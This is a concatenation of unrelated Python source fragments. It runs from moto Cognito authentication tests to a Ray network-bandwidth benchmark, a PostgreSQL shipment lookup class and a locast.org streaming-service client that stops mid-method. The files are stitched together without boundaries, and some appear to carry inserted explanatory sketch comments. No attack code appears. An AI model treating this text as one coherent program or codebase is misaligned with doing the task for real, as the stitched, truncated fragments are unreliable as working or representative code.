conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_confirm_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, 
ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_REFRESH_TOKEN(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": result["username"], "PASSWORD": result["password"]}, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["RefreshToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_not_found(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) 
with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": "INVALIDUSER", "PASSWORD": result["password"]}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_incorrect_password(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={ "USERNAME": result["username"], "PASSWORD": "NotAuthorizedException", }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": password}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotConfirmedException") @mock_cognitoidp def test_initiate_auth_for_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) except conn.exceptions.UserNotConfirmedException: caught = True caught.should.be.true @mock_cognitoidp def test_initiate_auth_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.describe_user_pool_client(UserPoolId=user_pool_id, ClientId=client_id) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) invalid_secret_hash = str(uuid.uuid4()) caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true 
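# Hedged sketch, not part of the original test module: the SRP and secret-hash tests in
# this file repeat the same inline computation several times. The Cognito SECRET_HASH is
# the base64-encoded HMAC-SHA256 of username + client_id, keyed with the client secret.
# The helper name _compute_secret_hash is an assumption for illustration; it relies on the
# module's existing base64/hashlib/hmac imports.
def _compute_secret_hash(username, client_id, client_secret):
    key = str(client_secret).encode("latin-1")
    msg = str(username + client_id).encode("latin-1")
    digest = hmac.new(key, msg, hashlib.sha256).digest()
    return base64.b64encode(digest).decode()
# Usage (hypothetical): secret_hash = _compute_secret_hash(username, client_id, client_secret)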
@mock_cognitoidp def test_setting_mfa(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) conn.verify_software_token( AccessToken=result["access_token"], UserCode="123456" ) conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) result = conn.admin_get_user( UserPoolId=result["user_pool_id"], Username=result["username"] ) result["UserMFASettingList"].should.have.length_of(1) @mock_cognitoidp def test_setting_mfa_when_token_not_verified(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) caught = False try: conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) except conn.exceptions.InvalidParameterException: caught = True caught.should.be.true @mock_cognitoidp def test_respond_to_auth_challenge_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) valid_secret_hash = result["secret_hash"] invalid_secret_hash = str(uuid.uuid4()) challenge = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": result["username"], "SRP_A": uuid.uuid4().hex, "SECRET_HASH": valid_secret_hash, }, ) challenge = conn.respond_to_auth_challenge( ClientId=result["client_id"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": challenge["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": result["username"], }, ) caught = False try: conn.respond_to_auth_challenge( ClientId=result["client_id"], Session=challenge["Session"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": result["username"], "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_set_user_password(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) conn.admin_set_user_password( UserPoolId=user_pool_id, Username=username, Password=password, Permanent=True ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) @mock_cognitoidp def test_change_password_with_invalid_token_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.change_password( AccessToken=str(uuid.uuid4()), PreviousPassword="previous_password", ProposedPassword="newer_password", ) ex.value.response["Error"]["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def 
test_confirm_forgot_password_with_non_existent_client_id_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.confirm_forgot_password( ClientId="non-existent-client-id", Username="not-existent-username", ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) ex.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_reset_password_and_change_password(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) temporary_pass = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_pass ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) # User should be in RESET_REQUIRED state after reset client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("RESET_REQUIRED") # Return to CONFIRMED status after NEW_PASSWORD_REQUIRED auth challenge auth_result = client.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": temporary_pass}, ) password = "Admin123!" auth_result = client.respond_to_auth_challenge( Session=auth_result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") # Return to CONFIRMED after user-initated password change client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) client.change_password( AccessToken=auth_result["AuthenticationResult"]["AccessToken"], PreviousPassword=password, ProposedPassword="Admin1234!", ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_reset_password_disabled_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create disabled user client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.admin_disable_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User is disabled") @mock_cognitoidp def test_admin_reset_password_unconfirmed_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create user in status FORCE_CHANGE_PASSWORD client.admin_create_user( UserPoolId=user_pool_id, 
Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User password cannot be reset in the current state.") @mock_cognitoidp def test_admin_reset_password_no_verified_notification_channel(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user without verified email or phone client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Cannot reset password for the user as there is no registered/verified email or phone_number" ) @mock_cognitoidp def test_admin_reset_password_multiple_invocations(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) for _ in range(3): try: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) user = client.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("RESET_REQUIRED") except ClientError: pytest.fail("Shouldn't throw error on consecutive invocations") # Test will retrieve public key from cognito.amazonaws.com/.well-known/jwks.json, # which isnt mocked in ServerMode if not settings.TEST_SERVER_MODE: @mock_cognitoidp def test_idtoken_contains_kid_header(): # https://github.com/spulec/moto/issues/3078 # Setup cognito = boto3.client("cognito-idp", "us-west-2") user_pool_id = cognito.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"][ "Id" ] client = cognito.create_user_pool_client( UserPoolId=user_pool_id, ExplicitAuthFlows=[ "ALLOW_ADMIN_USER_PASSWORD_AUTH", "ALLOW_REFRESH_TOKEN_AUTH", "ALLOW_ADMIN_NO_SRP_AUTH", ], AllowedOAuthFlows=["code", "implicit"], ClientName=str(uuid.uuid4()), CallbackURLs=["https://example.com"], ) client_id = client["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) temporary_password = "1TemporaryP@ssword" cognito.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, ) result = cognito.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": 
temporary_password}, ) # A newly created user is forced to set a new password # This sets a new password and logs the user in (creates tokens) password = "1F@kePassword" result = cognito.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) # id_token = result["AuthenticationResult"]["IdToken"] # Verify the KID header is present in the token, and corresponds to the KID supplied by the public JWT verify_kid_header(id_token) def verify_kid_header(token): """Verifies the kid-header is corresponds with the public key""" headers = jwt.get_unverified_headers(token) kid = headers["kid"] key_index = -1 keys = fetch_public_keys() for i in range(len(keys)): if kid == keys[i]["kid"]: key_index = i break if key_index == -1: raise Exception("Public key (kid) not found in jwks.json") def fetch_public_keys(): keys_url = "https://cognito-idp.{}.amazonaws.com/{}/.well-known/jwks.json".format( "us-west-2", "someuserpoolid" ) response = requests.get(keys_url).json() return response["keys"]
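# Hedged sketch, not part of the original test module: verify_kid_header above only checks
# that the token's kid appears in the downloaded JWKS. The snippet below additionally
# verifies the signature against the matching key, mirroring what test_token_legitimacy
# does with the bundled jwks-public.json. The helper name verify_token_signature is
# hypothetical; it relies on the module's existing json/jwt/jws imports (python-jose).
def verify_token_signature(token, keys):
    kid = jwt.get_unverified_headers(token)["kid"]
    matching = [key for key in keys if key["kid"] == kid]
    if not matching:
        raise Exception("Public key (kid) not found in jwks.json")
    # jws.verify raises if the token was not signed with the selected key
    return json.loads(jws.verify(token, matching[0], "RS256"))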
#!/usr/bin/env python # # Example of two process Ray program, worker sends values to parameter # server on a different machine # # Run locally: # ./ray_two_machines.py # # Run on AWS: # ./ray_two_machines.py --aws # Example timings # c5.18xlarge over network: over network: 63.0 ms: 1586.76 MB/second # c5.9xlarge over network: 399/400 added 100 MBs in 85.5 ms: 1170.26 MB/second # c5.18xlarge locally: 86 ms, 1218 MB/seconds (9.7 Gbps) # macbook pro locally: 978.9 ms, 102.15 MB/second # c5.18xlarge # 004/11 sent 100 MBs in 69.4 ms: 1440.31 MB/second # 005/11 sent 100 MBs in 68.1 ms: 1468.95 MB/second # 006/11 sent 100 MBs in 70.4 ms: 1421.40 MB/second # 007/11 sent 100 MBs in 69.5 ms: 1438.62 MB/second # 008/11 sent 100 MBs in 66.4 ms: 1506.90 MB/second # 009/11 sent 100 MBs in 76.5 ms: 1306.92 MB/second # 010/11 sent 100 MBs in 66.8 ms: 1497.64 MB/second # min: 66.36, median: 69.43, mean: 70.55 # Another run # 989/1000 sent 100 MBs in 54.6 ms: 1831.07 MB/second # 990/1000 sent 100 MBs in 54.4 ms: 1837.20 MB/second # 991/1000 sent 100 MBs in 54.8 ms: 1824.91 MB/second # 992/1000 sent 100 MBs in 53.4 ms: 1874.39 MB/second # 993/1000 sent 100 MBs in 53.1 ms: 1881.77 MB/second # 994/1000 sent 100 MBs in 52.7 ms: 1897.76 MB/second # 995/1000 sent 100 MBs in 55.4 ms: 1805.42 MB/second # 996/1000 sent 100 MBs in 53.4 ms: 1872.93 MB/second # 997/1000 sent 100 MBs in 52.7 ms: 1896.65 MB/second # 998/1000 sent 100 MBs in 54.0 ms: 1851.14 MB/second # 999/1000 sent 100 MBs in 53.6 ms: 1864.93 MB/second # min: 51.11, median: 55.45, mean: 60.74 # Bottom line: 30ms locally, 60ms over network import argparse import os import socket import subprocess import time import numpy as np import ray import util parser = argparse.ArgumentParser() parser.add_argument("--role", default='launcher', type=str, help="launcher/driver") parser.add_argument('--image', default='Deep Learning AMI (Ubuntu) Version 15.0') parser.add_argument("--size-mb", default=100, type=int, help='how much data to send at each iteration') parser.add_argument("--iters", default=11, type=int) parser.add_argument("--aws", action="store_true", help="enable to run on AWS") parser.add_argument("--xray", default=1, type=int, help="whether to use XRay backend") parser.add_argument('--nightly', default=1, type=int, help='whether to use nightly version') parser.add_argument('--name', default='ray_two_machines', type=str, help='name of the run') parser.add_argument("--ip", default='', type=str, help="internal flag, used to point worker to head node") args = parser.parse_args() dim = args.size_mb * 250 * 1000 @ray.remote(resources={"worker": 1}) class Worker(object): def __init__(self): self.gradients = np.ones(dim, dtype=np.float32) def compute_gradients(self): return self.gradients def ip(self): return ray.services.get_node_ip_address() @ray.remote(resources={"ps": 1}) class ParameterServer(object): def __init__(self): self.params = np.zeros(dim, dtype=np.float32) def receive(self, grad): self.params = grad # use = just to get network overhead return self.params def get_weights(self): return self.params def ip(self): return ray.services.get_node_ip_address() def run_launcher(): import ncluster if args.aws: ncluster.set_backend('aws') if args.nightly: # running locally MacOS print(f"asdfasdf {util.ossystem('uname')}") if 'Darwin' in util.ossystem('uname') and not args.aws: install_script = 'pip install -U https://s3-us-west-2.amazonaws.com/ray-wheels/latest/ray-0.5.2-cp36-cp36m-macosx_10_6_intel.whl' print(f"asdfasdf got install script {install_script}") 
else: install_script = 'pip install -U https://s3-us-west-2.amazonaws.com/ray-wheels/latest/ray-0.5.2-cp36-cp36m-manylinux1_x86_64.whl' else: install_script = 'pip install ray' job = ncluster.make_job(name=args.name, install_script=install_script, image_name=args.image, num_tasks=2) ps, worker = job.tasks if not ncluster.running_locally(): ps._run_raw('killall python', ignore_errors=True) worker._run_raw('killall python', ignore_errors=True) job.upload(__file__) job.upload('util.py') if args.xray: job.run('export RAY_USE_XRAY=1') job.run('ray stop') # https://ray.readthedocs.io/en/latest/resources.html?highlight=resources ps_resource = """--resources='{"ps": 1}'""" worker_resource = """--resources='{"worker": 1}'""" ps.run(f"ray start --head {ps_resource} --redis-port=6379") worker.run(f"ray start --redis-address={ps.ip}:6379 {worker_resource}") worker.run( f'./{__file__} --role=driver --ip={ps.ip}:6379 --size-mb={args.size_mb} --iters={args.iters}') print(worker.read('out')) def run_driver(): ray.init(redis_address=args.ip) worker = Worker.remote() ps = ParameterServer.remote() log = util.FileLogger('out') log(f"Worker ip {ray.get(worker.ip.remote())}") log(f"PS ip {ray.get(ps.ip.remote())}") log(f"Driver ip {socket.gethostbyname(socket.gethostname())}") time_list = [] for i in range(args.iters): start_time = time.perf_counter() grads = worker.compute_gradients.remote() result = ps.receive.remote(grads) ray.wait([result]) elapsed_time_ms = (time.perf_counter() - start_time)*1000 time_list.append(elapsed_time_ms) rate = args.size_mb / (elapsed_time_ms/1000) log('%03d/%d sent %d MBs in %.1f ms: %.2f MB/second' % (i, args.iters, args.size_mb, elapsed_time_ms, rate)) min = np.min(time_list) median = np.median(time_list) log(f"min: {min:8.2f}, median: {median:8.2f}, mean: {np.mean(time_list):8.2f}") def main(): if args.role == 'launcher': run_launcher() elif args.role == 'driver': run_driver() else: assert False, f"Unknown role {args.role}, must be laucher/driver" if __name__ == '__main__': main()
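# Minimal sketch of the round trip that run_driver() times above (added for
# clarity, not part of the original script): the worker produces a gradient
# array, the parameter server receives it, and ray.wait() blocks until the
# transfer has completed. Assumes the same cluster/resource setup and actor
# handles (Worker.remote(), ParameterServer.remote()) as in run_driver().
def _one_round_trip(worker, ps):
    grads = worker.compute_gradients.remote()   # object lives on the worker node
    result = ps.receive.remote(grads)           # ~size_mb MB crosses the network here
    ray.wait([result])                          # block until the ps holds the data
    return result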
import sys import time import psycopg2 as psycopg2 import os def start_database(): try: while True: try: conn = psycopg2.connect(dbname=os.environ['DB_NAME'], user=os.environ['DB_USERNAME'], password=os.environ['DB_PASSWORD'], host=os.environ['DB_HOSTNAME'], options=f'-c search_path={"schema_package"}') cur = conn.cursor() cur.execute('''select * from customer''') except psycopg2.OperationalError as e: print("Database is down: ", e) time.sleep(0.5) continue return conn except KeyError as e: raise Exception("Environment variable is missing: ", e) class ShipmentDatabase: def __init__(self): self.conn = start_database() def getShipmentsMap(self, key): cur = self.conn.cursor() cur.execute("""SELECT c.customerId, si.shipmentid, si.barcode, ST_AsText(si.destination), ST_AsText(si.startlocation), si.attachedprocessinstance, si.price, si.state FROM customer c INNER JOIN shipmentinfo si ON si.customerid = c.customerid WHERE c.customerApiKey ILIKE %s""", (key,)) el = [] for record in cur: el.append({ 'customerId': record[0], 'shipmentId': record[1], 'barcode': record[2], 'destination': record[3], 'startLocation': record[4], 'attachedProcessInstance': record[5], 'price': float(record[6]), 'state': record[7], }) return el
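# Illustrative usage sketch for the ShipmentDatabase module above (added for
# clarity, not part of the original file). It assumes the DB_NAME, DB_USERNAME,
# DB_PASSWORD and DB_HOSTNAME environment variables are set and that the
# customer/shipmentinfo tables exist; the API key below is a placeholder.
if __name__ == '__main__':
    # start_database() blocks until the database accepts connections,
    # retrying every 0.5s on psycopg2.OperationalError.
    db = ShipmentDatabase()

    # getShipmentsMap() returns one dict per shipment row, joined from
    # customer and shipmentinfo on customerid.
    for shipment in db.getShipmentsMap('example-api-key'):
        print(shipment['shipmentId'], shipment['state'], shipment['price'])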
import logging import re import threading from datetime import datetime from typing import Optional, Tuple import uuid import m3u8 import requests from locast2dvr.utils import Configuration, LoggingHandler from requests.exceptions import HTTPError from timezonefinder import TimezoneFinder from .fcc import Facilities LOGIN_URL = "https://api.locastnet.org/api/user/login" USER_URL = "https://api.locastnet.org/api/user/me" DMA_URL = "https://api.locastnet.org/api/watch/dma" IP_URL = 'https://api.locastnet.org/api/watch/dma/ip' STATIONS_URL = 'https://api.locastnet.org/api/watch/epg' WATCH_URL = 'https://api.locastnet.org/api/watch/station' TOKEN_LIFETIME = 3600 class Geo: def __init__(self, zipcode: Optional[str] = None, coords: Optional[dict] = None): """Object containing location information Args: zipcode (Optional[str], optional): Zipcode. Defaults to None. coords (Optional[dict], optional): Dict containing latitude and longitude. Defaults to None. """ self.zipcode = zipcode self.coords = coords def __repr__(self) -> str: if self.zipcode: return f"Geo(zipcode: {self.zipcode})" elif self.coords: return f"Geo(coords: {self.coords})" else: return f"Geo(None)" def __eq__(self, other): return self.coords == other.coords and \ self.zipcode == other.zipcode class LocationInvalidError(Exception): pass class UserInvalidError(Exception): pass class LocastService(LoggingHandler): _logged_in = False log = logging.getLogger("LocastService") # Necessary for class methods _login_lock = threading.Lock() def __init__(self, config: Configuration, geo: Geo): """Locast service interface based on a specific location Args: geo (Geo): Location information config (Configuration): Global configuration """ super().__init__() self.coords = geo.coords self.zipcode = geo.zipcode self.config = config self.location = None self.active = False self.dma = None self.city = None self.timezone = None self._channel_lock = threading.Lock() def start(self): self._fcc_facilities = Facilities.instance() self._load_location_data() self.uid = str(uuid.uuid5(uuid.UUID(self.config.uid), str(self.dma))) # Start cache updater timer if necessary, otherwise, just preload # stations once if self.config.cache_stations: self._update_cache() @classmethod def login(cls, username: str = None, password: str = None): """Log in to locast.org This is a class method, so we only have to login once. 
Args: username (str): Username password (str): Password """ with cls._login_lock: if username: cls.username = username if password: cls.password = password cls.log.info(f"Logging in with {cls.username}") try: r = requests.post(LOGIN_URL, json={ "username": cls.username, "password": cls.password }, headers={'Content-Type': 'application/json'}) r.raise_for_status() except HTTPError as err: raise UserInvalidError(f'Login failed: {err}') cls.token = r.json()['token'] cls._logged_in = True cls.last_login = datetime.now() cls._validate_user() cls.log.info("Locast login successful") @classmethod def _validate_user(cls) -> bool: """Validate if the user has an active donation Returns: bool: True if successful, otherwise False """ r = cls.get(USER_URL, authenticated=True) user_info = r.json() if user_info['didDonate'] and datetime.now() > datetime.fromtimestamp(user_info['donationExpire'] / 1000): raise UserInvalidError("Donation expired") elif not user_info['didDonate']: raise UserInvalidError("User didn't donate") def _is_token_valid(self) -> bool: """Check if the last login was longer than ``TOKEN_LIFETIME`` ago Returns: bool: True if valid, False otherwise """ with self._login_lock: return (datetime.now() - self.last_login).seconds < TOKEN_LIFETIME def _validate_token(self): """Validate if the login token is still valid. If not, login again to obtain a new token """ if not self._is_token_valid(): self.log.info("Login token expired!") self.login() def _load_location_data(self): """Load location data Raises: LocationInvalidError: If locast doesn't support the location """ self._find_location() if not self.active: raise LocationInvalidError(f'Locast not available in {self.city}') def _find_location(self): """Set the location data (lat, long, dma and city) based on what method is used to determine the location (coords, zip or IP) """ if self.coords: self._set_attrs_from_geo( f'{DMA_URL}/{self.coords["latitude"]}/{self.coords["longitude"]}') elif self.zipcode: self._set_attrs_from_geo(f'{DMA_URL}/zip/{self.zipcode}') else: self._set_attrs_from_geo(IP_URL) def _set_attrs_from_geo(self, url: str): 